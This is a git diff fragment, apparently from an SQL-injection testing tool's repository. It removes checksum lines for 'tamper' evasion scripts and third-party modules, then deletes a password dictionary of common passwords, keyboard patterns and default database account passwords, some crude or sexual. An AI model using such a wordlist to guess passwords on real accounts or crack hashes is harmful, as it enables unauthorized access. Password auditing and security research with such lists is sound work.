-2b6ec63af32b6a71c5de288e1d507d49513b9690a9c0c79b85e13aba1caabf23 tamper/space2morehash.py
-e434ba59a2a68c273a407d99762bf71d08f3b5876efacc9ef1c06d655d5fa7bb tamper/space2mssqlblank.py
-0795280f1264b9d2a92ea1017a30c3299fac00403ab35f8110fca173bfdee206 tamper/space2mssqlhash.py
-26faeb39842c3770d0f59d871325eb9a59ea29e5f43cfab2872edc7a947a3d73 tamper/space2mysqlblank.py
-50365aa886349a268ce39820af2b68d2b119bbfca53e97dbdbadb7296f8f4ce6 tamper/space2mysqldash.py
-e5a8d49f6985e27d2d0aebf1227a1d22dea11a4852ccf6ab7fa5e9c84c79a88c tamper/space2plus.py
-c8debf71c17719ea4f3c2f07596fcf3f9972f9b4ef70ae25893a1bd5bed8655c tamper/space2randomblank.py
-409214cfca98144ce28805ab65ff365189e398e9e9eabb709d1bc00ae7eb36c9 tamper/sp_password.py
-de34e24d47e84a0079665ff0253fdafac3d7b1444ae6429735fce1cecaba54c7 tamper/substring2leftright.py
-0b50c760a4c08d547a8f86234d9f40bfeb0311d81f342ab08c8a9c0f1cdf2e85 tamper/symboliclogical.py
-5a56f752f1276a4f60b442d7e13aa55d58f71dcc0113a1a849831a9b658cab20 tamper/unionalltounion.py
-a096122382135668beb66eecf266b77e616695021ee973d0301afe1098fd3ecd tamper/unmagicquotes.py
-c48f6dc142fbf062254494e4c41b62852f26095f10d01be85140d5fd836d98d3 tamper/uppercase.py
-b88ff93aeb9da9c4c056c6df94e94b798a860ce01846ae2a01962edf9f3ff794 tamper/varnish.py
-1219349c2c9fafa21e36dce8bdb5f0be52bd0b6e3d8af6233fe571239543c46b tamper/versionedkeywords.py
-6a006674d9e5dba780f6a81897e762b7da36dc259bf3775d392a562574cae7b5 tamper/versionedmorekeywords.py
-40c03cf396bc5a090b04f7588b9012ce4de29fc0eceb0ef5e0f7e687d5d11c08 tamper/xforwardedfor.py
-55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py
-e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py
-dfb8a36f58a3ae72c34d6a350830857c88ff8938fe256af585d5c9c63040c5b2 thirdparty/beautifulsoup/beautifulsoup.py
-7d62c59f787f987cbce0de5375f604da8de0ba01742842fb2b3d12fcb92fcb63 thirdparty/beautifulsoup/__init__.py
-0915f7e3d0025f81a2883cd958813470a4be661744d7fffa46848b45506b951a thirdparty/bottle/bottle.py
-9f56e761d79bfdb34304a012586cb04d16b435ef6130091a97702e559260a2f2 thirdparty/bottle/__init__.py
-0ffccae46cb3a15b117acd0790b2738a5b45417d1b2822ceac57bdff10ef3bff thirdparty/chardet/big5freq.py
-901c476dd7ad0693deef1ae56fe7bdf748a8b7ae20fde1922dddf6941eff8773 thirdparty/chardet/big5prober.py
-df0a164bad8aac6a282b2ab3e334129e315b2696ba57b834d9d68089b4f0725f thirdparty/chardet/chardistribution.py
-e9b0eef1822246e49c5f871af4881bd14ebd4c0d8f1975c37a3e82738ffd90ee thirdparty/chardet/charsetgroupprober.py
-2929b0244ae3ca9ca3d1b459982e45e5e33b73c61080b6088d95e29ed64db2d8 thirdparty/chardet/charsetprober.py
-558a7fe9ccb2922e6c1e05c34999d75b8ab5a1e94773772ef40c904d7eeeba0f thirdparty/chardet/codingstatemachine.py
-3ca4f31e449bb5b1c3a92f4fcae8cc6d7ef8ab56bc98ca5e4130d5b10859311c thirdparty/chardet/compat.py
-4d9e37e105fccf306c9d4bcbffcc26e004154d9d9992a10440bfe5370f5ff68c thirdparty/chardet/cp949prober.py
-0229b075bf5ab357492996853541f63a158854155de9990927f58ae6c358f1c5 thirdparty/chardet/enums.py
-924caa560d58c370c8380309d9b765c9081415086e1c05bc7541ac913a0d5927 thirdparty/chardet/escprober.py
-46e5e580dbd32036ab9ddbe594d0a4e56641229742c50d2471df4402ec5487ce thirdparty/chardet/escsm.py
-883f09769d084918e08e254dedfd1ef3119e409e46336a1e675740f276d2794c thirdparty/chardet/eucjpprober.py
-fbb19d9af8167b3e3e78ee12b97a5aeed0620e2e6f45743c5af74503355a49fa thirdparty/chardet/euckrfreq.py
-32a14c4d05f15b81dbcc8a59f652831c1dc637c48fe328877a74e67fc83f3f16 thirdparty/chardet/euckrprober.py
-368d56c9db853a00795484d403b3cbc82e6825137347231b07168a235975e8c0 thirdparty/chardet/euctwfreq.py
-d77a7a10fe3245ac6a9cfe221edc47389e91db3c47ab5fe6f214d18f3559f797 thirdparty/chardet/euctwprober.py
-257f25b3078a2e69c2c2693c507110b0b824affacffe411bbe2bc2e2a3ceae57 thirdparty/chardet/gb2312freq.py
-806bc85a2f568438c4fb14171ef348cab9cbbc46cc01883251267ae4751fca5c thirdparty/chardet/gb2312prober.py
-737499f8aee1bf2cc663a251019c4983027fb144bd93459892f318d34601605a thirdparty/chardet/hebrewprober.py
-62c3f9c1096c1c9d9ab85d516497f2a624ab080eff6d08919b7112fcd23bebe6 thirdparty/chardet/__init__.py
-be9989bf606ed09f209cc5513c730579f4d1be8fe16b59abc8b8a0f0207080e8 thirdparty/chardet/jisfreq.py
-3d894da915104fc2ccddc4f91661c63f48a2b1c1654d6103f763002ef06e9e0a thirdparty/chardet/jpcntx.py
-d47a904bd3dbb678f5c508318ad24cbf0f17ea42abe4ea1c90d09959f110acf1 thirdparty/chardet/langbulgarianmodel.py
-2ce0da8efb1eb47f3bc980c340a0360942d7507f3bb48db6ddd85f8e1f59c7d7 thirdparty/chardet/langcyrillicmodel.py
-f18016edb53c6304896a9d2420949b3ccc35044ab31a35b3a9ca9fd168142800 thirdparty/chardet/langgreekmodel.py
-2529ea984e44eb6b432d33d3bcba50b20e6038c3b83db75646f57b02f91cd070 thirdparty/chardet/langhebrewmodel.py
-4616a96121b997465a3be555e056a7e6c5b4591190aa1c0133ad72c77cb1c8e0 thirdparty/chardet/langhungarianmodel.py
-f25d35ef71aefd6e86f26c6640e4c417896cd98744ec5c567f74244b11065c94 thirdparty/chardet/langthaimodel.py
-5b6d9e44d26ca88eae5807f05d22955969c27ab62aac8f1d6504e6fccd254459 thirdparty/chardet/langturkishmodel.py
-4b6228391845937f451053a54855ad815c9b4623fa87b0652e574755c94d914f thirdparty/chardet/latin1prober.py
-011f797851fdbeea927ef2d064df8be628de6b6e4d3810a85eac3cb393bdc4b4 thirdparty/chardet/mbcharsetprober.py
-87a4d19e762ad8ec46d56743e493b2c5c755a67edd1b4abebc1f275abe666e1e thirdparty/chardet/mbcsgroupprober.py
-498df6c15205dc7cdc8d8dc1684b29cbd99eb5b3522b120807444a3e7eed8e92 thirdparty/chardet/mbcssm.py
-2c34a90a5743085958c149069300f6a05c4b94f5885974f4f5a907ff63e263be thirdparty/chardet/sbcharsetprober.py
-d48a6b70207f935a9f9a7c460ba3016f110b94aa83dec716e92f1823075ec970 thirdparty/chardet/sbcsgroupprober.py
-208b7e9598f4589a8ae2b9946732993f8189944f0a504b45615b98f7a7a4e4c4 thirdparty/chardet/sjisprober.py
-a8bd35ef8952644e38d9e076d679e4b53f7f55c0327b4ee5685594794ae3b6d6 thirdparty/chardet/universaldetector.py
-21d0fcbf7cd63ac07c38b8b23e2fb2fdfab08a9445c55f4d73578a04b4ae204c thirdparty/chardet/utf8prober.py
-b29dc1d3c9ab0d707ea5fdcaf5fa89ff37831ce08b0bc46b9e04320c56a9ffb8 thirdparty/chardet/version.py
-1c1ee8a91eb20f8038ace6611610673243d0f71e2b7566111698462182c7efdd thirdparty/clientform/clientform.py
-e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/clientform/__init__.py
-162d2e9fe40ba919bebfba3f9ca88eab20bc3daa4124aec32d5feaf4b2ad4ced thirdparty/colorama/ansi.py
-a7070aa13221d97e6d2df0f522b41f1876cd46cb1ddb16d44c1f304f7bab03a3 thirdparty/colorama/ansitowin32.py
-d7b5750fa3a21295c761a00716543234aefd2aa8250966a6c06de38c50634659 thirdparty/colorama/initialise.py
-f71072ad3be4f6ea642f934657922dd848dee3e93334bc1aff59463d6a57a0d5 thirdparty/colorama/__init__.py
-fd2084a132bf180dad5359e16dac8a29a73ebfd267f7c9423c814e7853060874 thirdparty/colorama/win32.py
-179e47739cdcb6d8f97713b4ecf2c84502ed9894d20cf941af5010a91b5275ea thirdparty/colorama/winterm.py
-4f4b2df6de9c0a8582150c59de2eb665b75548e5a57843fb6d504671ee6e4df3 thirdparty/fcrypt/fcrypt.py
-6a70ddcae455a3876a0f43b0850a19e2d9586d43f7b913dc1ffdf87e87d4bd3f thirdparty/fcrypt/__init__.py
-dbd1639f97279c76b07c03950e7eb61ed531af542a1bdbe23e83cb2181584fd9 thirdparty/identywaf/data.json
-e5c0b59577c30bb44c781d2f129580eaa003e46dcc4f307f08bc7f15e1555a2e thirdparty/identywaf/identYwaf.py
-edf23e7105539d700a1ae1bc52436e57e019b345a7d0227e4d85b6353ef535fa thirdparty/identywaf/__init__.py
-d846fdc47a11a58da9e463a948200f69265181f3dbc38148bfe4141fade10347 thirdparty/identywaf/LICENSE
-e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/__init__.py
-879d96f2460bc6c79c0db46b5813080841c7403399292ce76fe1dc0a6ed353d8 thirdparty/keepalive/__init__.py
-f517561115b0cfaa509d0d4216cd91c7de92c6a5a30f1688fdca22e4cd52b8f8 thirdparty/keepalive/keepalive.py
-e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/magic/__init__.py
-4d89a52f809c28ce1dc17bb0c00c775475b8ce01c2165942877596a6180a2fd8 thirdparty/magic/magic.py
-e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/multipart/__init__.py
-2574a2027b4a63214bad8bd71f28cac66b5748159bf16d63eb2a3e933985b0a5 thirdparty/multipart/multipartpost.py
-ef70b88cc969a3e259868f163ad822832f846196e3f7d7eccb84958c80b7f696 thirdparty/odict/__init__.py
-9a8186aeb9553407f475f59d1fab0346ceab692cf4a378c15acd411f271c8fdb thirdparty/odict/ordereddict.py
-691ae693e3a33dd730930492ff9e7e3bdec45e90e3a607b869a37ecd0354c2d8 thirdparty/prettyprint/__init__.py
-8df6e8c60eac4c83b1bf8c4e0e0276a4caa3c5f0ca57bc6a2116f31f19d3c33f thirdparty/prettyprint/prettyprint.py
-3739db672154ad4dfa05c9ac298b0440f3f1500c6a3697c2b8ac759479426b84 thirdparty/pydes/__init__.py
-4c9d2c630064018575611179471191914299992d018efdc861a7109f3ec7de5e thirdparty/pydes/pyDes.py
-c51c91f703d3d4b3696c923cb5fec213e05e75d9215393befac7f2fa6a3904df thirdparty/six/__init__.py
-e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/socks/__init__.py
-7027e214e014eb78b7adcc1ceda5aca713a79fc4f6a0c52c9da5b3e707e6ffe9 thirdparty/socks/LICENSE
-57dba7460c09b7922df68b981e824135f1a6306180ba4c107b626e3232513eff thirdparty/socks/socks.py
-e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/termcolor/__init__.py
-b14474d467c70f5fe6cb8ed624f79d881c04fe6aeb7d406455da624fe8b3c0df thirdparty/termcolor/termcolor.py
-4db695470f664b0d7cd5e6b9f3c94c8d811c4c550f37f17ed7bdab61bc3bdefc thirdparty/wininetpton/__init__.py
-7d7ec81c788600d02d557c13f9781bb33f8a699c5a44c4df0a065348ad2ee502 thirdparty/wininetpton/win_inet_pton.py
diff --git a/data/txt/smalldict.txt b/data/txt/smalldict.txt
deleted file mode 100644
index 20828f97f08..00000000000
--- a/data/txt/smalldict.txt
+++ /dev/null
@@ -1,9778 +0,0 @@
-
-!
-*
-*****
-******
-------
-:
-?????
-??????
-!@#$%
-!@#$%^
-!@#$%^&
-!@#$%^&*
-@#$%^&
-$HEX
-0
-0000
-0.0.000
-00000
-0.0.0.000
-000000
-0000000
-00000000
-0000000000
-0000007
-000001
-000007
-0007
-0069
-007
-007007
-007bond
-0101
-010101
-01011980
-01012011
-010203
-0123
-012345
-0123456
-01234567
-0123456789
-020202
-030303
-0420
-050505
-06071992
-0660
-0815
-090909
-0911
-0987
-098765
-09876543
-0987654321
-0racl3
-0racl38
-0racl38i
-0racl39
-0racl39i
-0racle
-0racle8
-0racle8i
-0racle9
-0racle9i
-!~!1
-1
-100
-1000
-100000
-1001
-100100
-1002
-100200
-1003
-1004
-1005
-1007
-1008
-1010
-101010
-10101010
-1011
-1012
-1013
-1014
-1015
-1016
-1017
-1018
-1020
-10203
-102030
-1022
-1023
-1024
-1025
-1026
-1027
-1028
-1029
-102938
-1029384756
-1030
-1031
-1066
-10sne1
-1101
-110110
-1102
-1103
-1104
-111
-1111
-11111
-111111
-1111111
-11111111
-1111111111
-111111a
-11112222
-1112
-111222
-111222tianya
-1114
-1115
-1117
-1120
-1121
-1122
-112211
-112233
-11223344
-1122334455
-1123
-112358
-11235813
-1123581321
-1124
-1125
-1129
-1200
-1201
-1204
-1205
-120676
-1207
-1208
-1209
-1210
-1211
-1212
-121212
-12121212
-1213
-121314
-1214
-1215
-1216
-1220
-1221
-1223
-1224
-1225
-1226
-1227
-1228
-123
-1230
-123098
-1231
-12312
-123123
-12312312
-123123123
-123123a
-12321
-1232323q
-123321
-1234
-12341234
-1234321
-12344321
-12345
-123451
-1234512345
-1234554321
-123456
-1234560
-1234561
-1234567
-12345678
-123456789
-1234567890
-1234567891
-12345678910
-123456789a
-123456789q
-12345678a
-12345679
-1234567a
-123456a
-123456aa
-123456abc
-123456b
-123456c
-123456d
-123456j
-123456k
-123456l
-123456m
-123456q
-123456s
-123456t
-123456z
-123457
-12345a
-12345q
-12345qwert
-12345qwerty
-12345t
-1234abcd
-1234qwer
-1235
-123654
-123654789
-123698745
-123789
-123987
-123aaa
-123abc
-123asd
-123asdf
-123go
-123hfjdk147
-123qwe
-123qwe123
-123qweasd
-123qweasdzxc
-12413
-1245
-124578
-1269
-12axzas21a
-12qwaszx
-1313
-131313
-13131313
-1314520
-1316
-1332
-1342
-134679
-1357
-13579
-135790
-1369
-1412
-1414
-141414
-14141414
-142536
-142857
-1430
-143143
-1464688081
-147147
-147258
-14725836
-147258369
-147852
-147852369
-1478963
-14789632
-147896325
-1492
-1515
-151515
-159159
-159357
-159753
-159753qq
-159951
-1616
-161616
-1701
-1701d
-1717
-171717
-17171717
-1776
-1812
-1818
-181818
-18436572
-187187
-1911
-1919
-191919
-1928
-1941
-1942
-1943
-1944
-1945
-1946
-1947
-1948
-1949
-1950
-1951
-1952
-1953
-1954
-1955
-1956
-1957
-1958
-1959
-1960
-1961
-1962
-1963
-1964
-1965
-1966
-1967
-1968
-1969
-19691969
-196969
-1970
-1971
-1972
-1973
-1974
-19741974
-1975
-1976
-1977
-1978
-19781978
-1979
-1980
-1981
-1982
-1983
-1984
-19841984
-1985
-1986
-1987
-1988
-1989
-1990
-1991
-1992
-199220706
-1993
-1994
-1995
-1996
-1997
-1998
-1999
-199999
-1a2b3c
-1a2b3c4d
-1chris
-1g2w3e4r
-1kitty
-1p2o3i
-1passwor
-1password
-1q2w3e
-1q2w3e4r
-1q2w3e4r5t
-1q2w3e4r5t6y
-1qa2ws3ed
-1qaz
-1qaz2wsx
-1qaz2wsx3edc
-1qazxsw2
-1qw23e
-1qwerty
-1v7Upjw3nT
-1x2zkg8w
-2000
-200000
-20002000
-2001
-20012001
-2002
-2003
-2004
-2005
-2010
-2020
-202020
-20202020
-2112
-21122112
-2121
-212121
-21212121
-22
-2200
-2211
-2222
-22222
-222222
-2222222
-22222222
-222333
-222777
-223344
-2252
-2323
-232323
-23232323
-2345
-234567
-23skidoo
-2424
-242424
-24242424
-2468
-24680
-246810
-24682468
-2469
-2525
-252525
-25252525
-256879
-2580
-25802580
-2626
-262626
-2727
-272727
-2828
-282828
-290966
-292929
-29rsavoy
-2fast4u
-2kids
-3000gt
-3006
-3010
-3030
-303030
-3112
-311311
-3131
-313131
-3141
-314159
-31415926
-315475
-321123
-321321
-321654
-3232
-323232
-332211
-333
-3333
-33333
-333333
-3333333
-33333333
-333666
-336699
-3434
-343434
-3533
-353535
-362436
-3636
-363636
-36633663
-369
-369369
-373737
-383838
-393939
-3bears
-3ip76k2
-3rJs1la7qE
-4040
-404040
-4055
-4121
-4128
-414141
-4200
-420000
-420247
-420420
-421uiopy258
-4242
-424242
-426hemi
-4321
-434343
-4417
-4444
-44444
-444444
-4444444
-44444444
-445566
-4545
-454545
-456123
-456321
-456456
-456654
-4567
-456789
-456852
-464646
-4711
-474747
-4788
-4815162342
-484848
-485112
-4854
-494949
-49ers
-4ever
-4runner
-5000
-5050
-505050
-50cent
-50spanks
-5121
-514007
-5150
-515000
-51505150
-515151
-5201314
-520520
-5252
-525252
-5329
-535353
-5424
-54321
-543210
-5454
-545454
-5551212
-5555
-55555
-555555
-5555555
-55555555
-5555555555
-555666
-5656
-565656
-5678
-567890
-5683
-575757
-57chevy
-585858
-606060
-616161
-6262
-626262
-6301
-635241
-636363
-646464
-654321
-655321
-656565
-666
-6666
-66666
-666666
-6666666
-66666666
-666777
-666999
-676767
-686868
-6969
-696969
-69696969
-6996
-7007
-717171
-727272
-737373
-741852
-741852963
-747474
-753159
-753951
-757575
-7654321
-767676
-7734
-7758521
-777
-7777
-77777
-777777
-7777777
-77777777
-7779311
-778899
-786786
-787878
-789123
-7894
-789456
-78945612
-789456123
-789654
-789789
-789987
-797979
-7dwarfs
-80486
-818181
-81fukkc
-852456
-8675309
-868686
-87654321
-878787
-8888
-88888
-888888
-8888888
-88888888
-8989
-898989
-90210
-909090
-911
-911911
-9379992
-951753
-963852
-963852741
-969696
-987456
-9876
-98765
-987654
-98765432
-987654321
-9876543210
-987987
-989898
-9999
-99999
-999999
-9999999
-99999999
-999999999
-a
-a12345
-a123456
-a1234567
-a12345678
-a123456789
-a1b2c3
-a1b2c3d4
-a1s2d3f4
-a838hfiD
-aa
-aa123456
-aa12345678
-aaa
-aaa111
-aaaa
-aaaaa
-aaaaa1
-aaaaaa
-aaaaaa1
-aaaaaaa
-aaaaaaaa
-aaliyah
-aardvark
-aaron
-aaron1
-abacab
-abbott
-abby
-abc
-abc123
-ABC123
-abc1234
-abc12345
-abc123456
-abcabc
-abcd
-abcd123
-abcd1234
-Abcd1234
-abcde
-abcdef
-Abcdef
-abcdefg
-Abcdefg
-abcdefg1
-abcdefg123
-abcdefgh
-aberdeen
-abgrtyu
-abigail
-abm
-abnormal
-abraham
-absolut
-absolute
-absolutely
-abstr
-academia
-academic
-access
-access14
-accord
-account
-ace
-aceace
-achilles
-achtung
-acidburn
-acropolis
-action
-active
-acura
-ada
-adam
-adam12
-adams
-addict
-addison
-adg
-adgangskode
-adi
-adidas
-adldemo
-admin
-Admin
-admin1
-admin12
-admin123
-adminadmin
-administrator
-admiral
-adobe1
-adobe123
-adobeadobe
-adonis
-adrian
-adriana
-adrianna
-adrienne
-adrock
-adult
-adults
-advance
-advent
-advil
-aerobics
-africa
-again
-agent
-aggies
-agosto
-agustin
-ahl
-ahm
-aikido
-aikman
-aikotoba
-aileen
-airborne
-airbus
-airforce
-airman
-airoplane
-airplane
-airport
-airwolf
-aisan
-ak
-akf7d98s2
-aki123
-akira
-alabama
-aladin
-alan
-alanis
-alaska
-albany
-albatros
-albatross
-albert
-alberta
-alberto
-albion
-alchemy
-alcohol
-alejandr
-alejandra
-alejandro
-alex
-alex1
-alexalex
-alexande
-alexander
-alexander1
-alexandr
-alexandra
-alexandre
-alexia
-alexis
-Alexis
-alexis1
-alf
-alfa
-alfaro
-alfred
-alfredo
-algebra
-ali
-alias
-aliases
-alibaba
-alice
-alice1
-alicia
-alien
-aliens
-alina
-aline
-alisa
-alisha
-alison
-alissa
-alive
-all4one
-allan
-allegro
-allen
-alleycat
-allgood
-alliance
-allison
-allmine
-allo
-allsop
-allstar
-allstate
-almighty
-almond
-aloha
-alone
-alpha
-Alpha
-alpha1
-alphabet
-alpine
-alr
-altamira
-althea
-altima
-altima1
-alucard
-always
-alyssa
-ama
-amadeus
-amanda
-amanda1
-amateur
-amateurs
-amazing
-amazon
-amber
-amber1
-ambers
-ambrose
-ambrosia
-amelia
-amelie
-america
-america1
-american
-amethyst
-amho
-amigo
-amigos
-amorphous
-amour
-ams
-amstel
-amsterda
-amsterdam
-amv
-amy
-anaconda
-anakin
-anal
-analog
-analsex
-anarchy
-anastasi
-anchor
-anders
-andersen
-anderson
-andre
-andre1
-andrea
-andrea1
-andreas
-andrei
-andres
-andrew
-andrew!
-Andrew
-andrew1
-andrey
-andromache
-andromed
-andromeda
-andy
-andyod22
-anfield
-angel
-angel1
-angel123
-angela
-angelica
-angelika
-angelina
-angelito
-angelo
-angels
-angelus
-angerine
-angie
-angie1
-angus
-angus1
-anhyeuem
-animal
-animals
-Animals
-anime
-anita
-ann
-anna
-annabell
-anne
-anneli
-annette
-annie
-annie1
-annika
-annmarie
-anonymous
-another
-answer
-antares
-antelope
-anthony
-Anthony
-anthony1
-anthrax
-anthropogenic
-antoine
-anton
-antonia
-antonio
-antony
-anubis
-anvils
-anything
-aobo2010
-aolsucks
-ap
-apache
-apollo
-apollo13
-apple
-apple1
-apple123
-apple2
-applepie
-apples
-applmgr
-applsys
-applsyspub
-apppassword
-apps
-april
-april1
-aprilia
-aptiva
-aq
-aqdemo
-aqjava
-aqua
-aquarius
-aquser
-ar
-aragorn
-aramis
-arcadia
-archange
-archer
-archie
-area51
-argentin
-argentina
-aria
-ariadne
-ariana
-ariane
-arianna
-ariel
-Ariel
-aries
-arizona
-arkansas
-arlene
-armada
-armand
-armando
-armani
-armstron
-army
-arnold
-around
-arrow
-arrows
-arsenal
-arsenal1
-artemis
-arthur
-artist
-arturo
-asasas
-asd
-asd123
-asd123456
-asdasd
-asdasd123
-asdasd5
-asdasdasd
-asddsa
-asdf
-asdf12
-asdf123
-asdf1234
-asdf12345
-asdfasdf
-asdfg
-asdfg1
-asdfgh
-Asdfgh
-asdfgh1
-asdfghj
-asdfghjk
-asdfghjkl
-asdfghjkl1
-asdfjkl
-asdfjkl;
-asdf;lkj
-asdqwe123
-asdsa
-asdzxc
-asf
-asg
-asgard
-ashlee
-ashleigh
-ashley
-ashley1
-ashraf
-ashton
-asia
-asian
-asians
-asimov
-asl
-asm
-aso
-asp
-aspateso19
-aspen
-aspire
-ass
-assass
-assassin
-assfuck
-asshole
-asshole1
-assholes
-assman
-assmunch
-assword
-ast
-asterix
-astra
-astral
-astrid
-astro
-astros
-ath
-athena
-athens
-athlon
-atlanta
-atlantic
-atlantis
-atlas
-atmosphere
-atomic
-attack
-atticus
-attila
-attitude
-aubrey
-auburn
-audi
-audia4
-audio
-audiouser
-auditt
-audrey
-auggie
-august
-august07
-augusta
-augustus
-aurelie
-aurora
-aussie
-austin
-austin1
-austin31
-australi
-australia
-austria
-auto
-autumn
-avalanch
-avalon
-avatar
-avenger
-avenir
-avenue
-aviation
-awesome
-awful
-awnyce
-ax
-ayelet
-aylmer
-az
-az1943
-azazel
-azerty
-azertyui
-azertyuiop
-azsxdc
-aztecs
-azure
-azzer
-b123456
-baba
-babe
-babes
-babies
-baby
-baby12
-baby123
-babybaby
-babyblue
-babyboy
-babyboy1
-babycake
-babydoll
-babyface
-babygirl
-babygirl1
-babygurl1
-babylon
-babylon5
-babylove
-bacardi
-bacchus
-bach
-back
-backdoor
-backup
-backupexec
-bacon
-badass
-badboy
-baddog
-badger
-badgers
-badgirl
-badman
-badoo
-baggins
-baggio
-bahamut
-bailey
-Bailey
-bailey1
-baili123com
-baker
-balance
-baldwin
-ball
-baller
-ballet
-ballin
-ballin1
-balloon
-balloons
-balls
-bambam
-bambi
-bamboo
-banana
-bananas
-banane
-bandit
-bang
-bangbang
-banger
-bangkok
-bank
-banker
-banks
-banner
-banshee
-banzai
-bar
-baraka
-barbados
-barbara
-barber
-barbie
-barcelon
-barcelona
-barefoot
-barfly
-baritone
-barker
-barkley
-barley
-barn
-barnes
-barney
-barney1
-barnyard
-baron
-barrett
-barron
-barry
-barry1
-bart
-bartman
-barton
-base
-baseball
-baseball1
-basf
-basic
-basil
-basket
-basketba
-basketball
-bass
-basset
-bassman
-bassoon
-bastard
-Bastard
-bastards
-batch
-bathing
-batman
-batman1
-battery
-battle
-baxter
-bayern
-baylor
-bball
-bbbb
-bbbbb
-bbbbbb
-bbbbbbb
-bbbbbbbb
-bc4j
-bcfields
-bdsm
-beach
-beaches
-beacon
-beagle
-beaker
-beamer
-bean
-bean21
-beaner
-beanie
-beans
-bear
-bearbear
-bearcat
-bearcats
-beardog
-bears
-bearshare
-beast
-beastie
-beasty
-beater
-beatle
-beatles
-beatrice
-beatriz
-beautifu
-beautiful
-beautiful1
-beauty
-beaver
-beavis
-Beavis
-beavis1
-bebe
-because
-becca
-becker
-beckham
-becky
-bedford
-beebop
-beech
-beefcake
-beemer
-beer
-beerbeer
-beerman
-beethoven
-beetle
-beezer
-belgium
-believe
-belinda
-belize
-bell
-bella
-bella1
-belle
-belmont
-beloved
-ben
-benben
-bender
-benfica
-beng
-bengals
-benito
-benjamin
-benji
-bennett
-bennie
-benny
-benoit
-benson
-bentley
-benz
-beowulf
-berenice
-beretta
-berger
-bergkamp
-berkeley
-berlin
-berliner
-bermuda
-bernard
-bernardo
-bernie
-berry
-bert
-bertha
-bertie
-beryl
-bessie
-best
-bestbuy
-bestfriend
-beta
-betacam
-beth
-bethany
-betito
-betsie
-betsy
-better
-betty
-beverly
-bharat
-bhf
-bian
-bianca
-biao
-biatch
-bic
-bicameral
-bichilora
-bichon
-bicycle
-bigal
-bigass
-bigballs
-bigbear
-bigben
-bigbig
-bigbird
-bigblock
-bigblue
-bigbob
-bigboobs
-bigbooty
-bigboss
-bigboy
-bigbutt
-bigcat
-bigcock
-bigdaddy
-bigdawg
-bigdick
-bigdicks
-bigdog
-bigfish
-bigfoot
-bigger
-biggie
-biggles
-biggun
-bigguns
-bigguy
-bighead
-bigmac
-bigman
-bigmike
-bigmoney
-bigone
-bigones
-bigpimp
-bigpoppa
-bigred
-bigsexy
-bigtime
-bigtit
-bigtits
-biit
-bike
-biker
-bikini
-bil
-bilbo
-bill
-billabon
-billie
-bills
-billy
-billy1
-billybob
-billyboy
-bim
-bimbo
-bimilbeonho
-bimmer
-bing
-bingo
-bingo1
-binky
-binladen
-bioboy
-biochem
-biology
-bird
-bird33
-birddog
-birdie
-birdman
-birdy
-birgit
-birthday
-bis
-biscuit
-bishop
-bismillah
-Bismillah
-bisounours
-bitch
-bitch1
-bitchass
-bitches
-bitchy
-biteme
-bitter
-biv
-bix
-biz
-bizkit
-blabla
-black
-black1
-blackbir
-blackcat
-blackdog
-blackhaw
-blackie
-blackjac
-blackjack
-blacklab
-blackman
-blackout
-blacks
-blacky
-blade
-blades
-blah
-blahblah
-blaine
-blake
-blam
-blanca
-blanche
-blanco
-blast
-blaster
-blaze
-blazer
-bledsoe
-blessed
-blessed1
-blessing
-blewis
-blinds
-Blink123
-blink182
-bliss
-blitz
-blizzard
-blond
-blonde
-blondes
-blondie
-blood
-bloody
-blossom
-blow
-blowfish
-blowjob
-blowme
-blubber
-blue
-blue12
-blue123
-blue1234
-blue22
-blue32
-blue42
-blue99
-blueball
-bluebell
-bluebird
-blueblue
-blueboy
-bluedog
-blueeyes
-bluefish
-bluejays
-bluejean
-bluemoon
-blues
-blues1
-bluesky
-bluesman
-bmw
-bmw325
-bmwbmw
-boat
-boater
-boating
-bob
-bob123
-bobafett
-bobbie
-bobbob
-bobby
-bobby1
-bobcat
-bobdole
-bobdylan
-bobo
-bobobo
-bodhisattva
-body
-boeing
-bogart
-bogey
-bogus
-bohica
-boiler
-bolitas
-bollocks
-bollox
-bologna
-bolton
-bom
-bomb
-bombay
-bomber
-bombers
-bonanza
-bonbon
-bond
-bond007
-Bond007
-bondage
-bone
-bonehead
-boner
-bones
-bongo
-bonita
-bonjour
-bonjovi
-bonkers
-bonner
-bonnie
-bonsai
-Bonzo
-boob
-boobear
-boobie
-boobies
-booboo
-Booboo
-booboo1
-boobs
-booger
-boogie
-book
-booker
-bookie
-books
-bookworm
-boom
-boomer
-boomer1
-booster
-bootie
-boots
-bootsie
-bootsy
-booty
-bootys
-booyah
-boozer
-borabora
-bordeaux
-borders
-boricua
-boris
-borussia
-bosco
-boss
-BOSS
-boss123
-bossman
-boston
-Boston
-bottle
-bottom
-boulder
-bounce
-bounty
-bourbon
-bowler
-bowling
-bowman
-bowser
-bowtie
-bowwow
-boxcar
-boxer
-boxers
-boxing
-boxster
-boyboy
-boys
-boytoy
-boyz
-bozo
-br0d3r
-br549
-brad
-bradford
-bradley
-brady
-brain
-brains
-branch
-brandi
-brando
-brandon
-brandon1
-brandy
-brandy1
-brasil
-braves
-bravo
-brazil
-breaker
-breanna
-breast
-breasts
-breeze
-brenda
-brendan
-brennan
-brent
-brest
-brett
-brewer
-brewster
-brian
-brian1
-briana
-brianna
-bricks
-bridge
-bridges
-bridget
-briggs
-bright
-brighton
-brigitte
-brio_admin
-bristol
-britain
-british
-britney
-brittany
-brittany1
-brittney
-broadway
-Broadway
-brodie
-broken
-broker
-bronco
-broncos
-broncos1
-bronson
-bronte
-bronze
-brook
-brooke
-brooklyn
-brooks
-brother
-brothers
-brown
-brown1
-brownie
-browning
-browns
-bruce
-bruce1
-brucelee
-bruins
-bruiser
-brujita
-bruno
-bruno1
-brutus
-bryan
-bryant
-bsc
-bsd
-bubba
-bubba1
-bubba123
-bubba69
-bubbas
-bubble
-bubbles
-bubbles1
-buceta
-buck
-bucket
-buckeye
-buckeyes
-buckley
-bucks
-buckshot
